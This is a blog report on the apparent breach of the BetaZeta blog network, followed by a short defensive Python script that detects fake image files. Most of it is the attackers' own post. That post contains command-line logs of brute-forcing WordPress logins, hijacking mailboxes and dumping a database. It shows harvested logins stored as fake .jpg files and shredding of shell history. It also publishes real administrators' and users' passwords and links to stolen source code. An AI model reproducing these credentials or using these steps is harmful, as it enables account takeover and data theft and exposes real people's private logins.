About a couple of hours ago, the Chilean technology blog was reportedly hacked, as can be seen in the screenshot of the blog, which is currently down.

But this blog is not the only one that was hacked; the rest of the blogs in that network have suffered the same fate.
http://www.betazeta.com
http://www.fayerwayer.com
http://www.theclinic.cl
http://www.saborizante.cl
http://leo.prieto.cl
http://www.betaid.org
http://www.wayerless.com
http://www.niubie.com
http://www.botonturbo.com
http://www.tecnosquad.com
http://www.chw.net
http://www.zetacorp.net
http://www.zimio.com
http://www.i2b.cl
Those responsible for hacking this blog were the so-called “teletubbies”, who not only mocked the weak password security (most of the passwords contain only letters) but also published the passwords on the blog itself. The methods used to recover the administrators' passwords were brute force for the first, since his password consisted only of digits, and a dictionary attack for the second. Below is the post that was published by the group of hackers.
F4Y3RW4Y3R PWN3D
from FayerWayer by WordPress
|||||||||||||||||||||||||||||||||||||||||||||||||||||
[================== 1ns3c gr0up ====================]
[------- t1nky_w1nky - d1psy - l44_l44 - p0 -------]
___________ .___.____ __
\_ _____/ _ \ | | | ________ _____/ |______
| __)/ /_\ \| | | \___ // __ \ __\__ \
| \/ | \ | |___ / /\ ___/| | / __ \_
\___ /\____|__ /___|_______ \/_____ \\___ >__| (____ /
\/ \/ \/ \/ \/ \/
[======================| 0wn3d |=====================]
||||||||||||||||||||||||||||||||||||||||||||||||||||||
/*
* BetaFail (aka BetaZeta aka LoserZeta aka BetaWeeta — thnx chilean dudes ^^)
* is a loser-blogger-network which claims to be experts on technology… so lets see!
*/
]====== 0x00 ======[ Index
[=-0x01-=] Affected domains
[=-0x02-=] Vulnerabilities
[=-0x03-=] Intrusion
[=-0x04-=] Data requesting
[=-0x05-=] Exposure
[=-0x06-=] Extras
-------------------------------------------------------------------------------
]====== 0x01 ======[ Affected Domains
+ The affected domains are:
|- http://www.betazeta.com
|- http://www.fayerwayer.com
|- http://www.theclinic.cl
|- http://www.saborizante.cl
|- http://leo.prieto.cl
|- http://www.betaid.org
|- http://www.wayerless.com
|- http://www.niubie.com
|- http://www.botonturbo.com
|- http://www.tecnosquad.com
|- http://www.chw.net
|- http://www.zetacorp.net
|- http://www.zimio.com
|- http://www.i2b.cl
|_/
-
-------------------------------------------------------------------------------
]====== 0x02 ======[ Vulnerabilities
/*
* So you can ask yourself, how can this be? Easy: if you set a weak
* password you have a weak security, if you store all your accounts in your mail
* you have a weak security.
* -> JF aka JF10 aka Juan Francisco Diez has a 9 int long password, easy enough to
* be brute forced.
* -> Leo aka Leo Prieto has a 5 char + 3 int password (dictionary password).
* And so on... these dudes really don't know shit about security and lucky for us
* their servers were totally open for us (open legs?).
*/
-------------------------------------------------------------------------------
]====== 0x03 ======[ Intrusion
/* Hey ho, lets GO! */
(=| proof-of-concept |=)
/* First get the silliest password ever from our very best friend JF on any of
* the services he uses: twitter, wordpress, etc.. (yes... really silly but he uses
* the same password for everything!):
*/
[1nf3ct3d@darkside:~]$ cat bruteforce-wordlist |bf -user=jf10 http://www.fayerwayer.com/wp-login.php
|===== expl0iting www.fayerwayer.com ====|
……………………………………………………………………..
……………………………………………………………………..
………………….. FOUND! (2020229)
[1nf3ct3d@darkside:~]$ cat bruteforce-wordlist |bf -user='leo prieto' http://www.fayerwayer.com/wp-login.php
|===== expl0iting www.fayerwayer.com ====|
……………………………………………………………………..
……………………………………………………………………..
……………………………………………………………………..
………………………………………….. FOUND! (macoy123)
[1nf3ct3d@darkside:~]$
/* Done. Now, search a prompt: */
[1nf3ct3d@darkside:~]$ telnet fayerwayer.com 37337
Trying 174.132.120.218…
Connected to fayerwayer.com.
Escape character is '^]'.
bash$
/* Now we can try with anything… say… gmail: */
[1nf3ct3d@darkside:~]$ ./gmail-delete.py -user jf10 -pass 2020229 http://mail.google.com/a/betazeta.com
Logged in.
Deleting
[================================================================================================] 100%
Changing user password … OK
New password is: HuJucF53
/* Heh! Now lets play with Leo Prieto’s stuff (again… same password almost
* for everything) */
[1nf3ct3d@darkside:~]$ ./gmail-delete.py -user leo -pass macoy123 http://mail.google.com/a/betazeta.com
Logged in.
Deleting
[================================================================================================] 100%
Changing user password … OK
New password is: 4Gh4Fhb
[1nf3ct3d@darkside:~]$
-------------------------------------------------------------------------------
]====== 0x04 ======[ Data requesting
/* Wordpress has been infected ... now waiting for our data */
[1nf3ct3d@darkside:~]$ wget http://www.wayerless.com/wp-content/uploads/2008/12/sheet.jpg -o /dev/null
[1nf3ct3d@darkside:~]$ tail sheet.jpg
user: pass:
user: pass:
user: mr_self-destruct pass: 13587527
user: march3lo pass: marcel
user: mr_self-destruct pass: 88007239
user: mr_self-destruct pass: 88007239
user: sir_lestat pass: martin
user: asdsadfsadf pass: lalalalalala
user: Chok pass: minako
user: successor pass: BWN72HL0
/* Amazing …. */
[1nf3ct3d@darkside:~]$ wc -l sheet.jpg
682 sheet.jpg
[1nf3ct3d@darkside:~]$ wget http://www.botonturbo.com/wp-content/uploads/2007/11/sheet.jpg -o /dev/null -O sheet2.jpg
[1nf3ct3d@darkside:~]$
/* Awesome! For each domain we repeat */
[1nf3ct3d@darkside:~]$ ssh betaid@betaid.org
Password:
betaid@betaid.org:~$ ls
app_error.php app_model.php config controllers htaccess.template httpdocs index.php locale models plugins tests tmp vendors views webroot
betaid@betaid.org:~$ cd config
betaid@betaid.org:~/config$ ls
acl.ini.php betaid.php bootstrap.php chile.sql core.php database.php entelpcs.php inflections.php openid.php routes.php sql
betaid@betaid.org:~$ grep -v \* database.php
class DATABASE_CONFIG {
    var $default = array(
        'driver' => 'mysql',
        'persistent' => false,
        'host' => 'localhost',
        'login' => 'betaman', /* look at this! */
        'password' => 'betapass',
        'database' => 'betaid_main',
        'encoding'=> 'UTF8',
        'prefix' => '',
    );
    var $test = array(
        'driver' => 'mysql',
        'persistent' => false,
        'host' => 'localhost',
        'login' => 'user',
        'password' => 'password',
        'database' => 'test_database_name',
        'prefix' => '',
    );
}
betaid@betaid.org:~$
/* OMFG! Is a DB_delete_all_my_content password? */
betaid@betaid.org:~$ mysqldump -ubetaman -pbetapass betaid_main >../httpdocs/betaz.sql
betaid@betaid.org:~$ exit
[1nf3ct3d@darkside:~]$ wget http://www.betaid.org/betaz.sql -o /dev/null
[1nf3ct3d@darkside:~]$ ssh betaid@betaid.org "rm -rf httpdocs/betaz.sql && shred .bash_history"
Password:
[1nf3ct3d@darkside:~]$
/* Its time to infect betaid to obtain all data!. We modify controller/auth_controller.php and pump it up */
[1nf3ct3d@darkside:~]$ wget http://www.wayerless.com/wp-content/uploads/2008/11/audi-a3.jpg -o /dev/null
[1nf3ct3d@darkside:~]$ wc -l audi-a3.jpg
262 audi-a3.jpg
[1nf3ct3d@darkside:~]$ tail -5 audi-a3.jpg
user: zector pass: celular
user: chokolat pass: dagchuman
user: andru pass: nenyaa
user: angrod pass: angrod01
user: elmono pass: 15369775
[1nf3ct3d@darkside:~]$ perl http-delete.pl http://www.wayerless.com/wp-content/uploads/2008/11/audi-a3.jpg -u admin
admin’s pwd:
1 file(s) deleted.
[1nf3ct3d@darkside:~]$
-------------------------------------------------------------------------------
]====== 0x05 ======[ Exposure
/* All that you want to see! THE DATA! */
/* Anyone want to twit? */
-------------------------------------------------------------------------------
]====== 0x06 ======[ Extras
/* Do you remember when CHW was eradicated?
* Oh wait. Remember bootlog too?
* — That was the OPPORTUNITY which BetaZeta has to set a REAL security-policy
*
* Wanna download the betaid source code? Here:
*
* http://rapidshare.com/files/254417420/betaid.org.zip.html
* http://www.megaupload.com/?d=8FT5KYTP
*
*
* Direct message to JF: Be more humble, piece of shit.
* Seeya in the next issue!
*/
/* Dud3s! Y0u’ve been pwn3d by teletubbies! */
EOF
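
The write-up above describes harvested logins being written to files with image names under wp-content/uploads (sheet.jpg, audi-a3.jpg) and fetched over HTTP. As an added example, not part of the original post or of anything the group published, this Python check flags files whose image extension does not match their leading bytes; the directory layout, sample files and function names are constructed for illustration.

```python
import os
import tempfile

# Leading magic bytes for the image types normally stored in an uploads tree.
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

def find_fake_images(root):
    """Return sorted paths under root whose image extension does not match the content."""
    suspects = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            ext = os.path.splitext(name)[1].lower()
            if ext not in MAGIC:
                continue  # only files claiming to be images are checked
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                head = fh.read(8)
            # Empty or text files fail this test and are reported.
            if not head.startswith(MAGIC[ext]):
                suspects.append(path)
    return sorted(suspects)

def build_sample_tree(root):
    """Constructed sample: one file with a JPEG header, one text log named like an image."""
    month = os.path.join(root, "wp-content", "uploads", "2008", "12")
    os.makedirs(month)
    with open(os.path.join(month, "photo.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32)
    with open(os.path.join(month, "sheet.jpg"), "wb") as fh:
        fh.write(b"user: example_user pass: example_pass\n")  # placeholder values
    return month

def demo():
    """Build the constructed tree in a temp dir and return the flagged relative paths."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return [os.path.relpath(p, root) for p in find_fake_images(root)]

if __name__ == "__main__":
    for hit in demo():
        print("extension/content mismatch:", hit)
```

Run periodically against the real uploads directory, a hit on a file that is also growing between runs is a strong sign that application code has been modified to log submitted logins.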


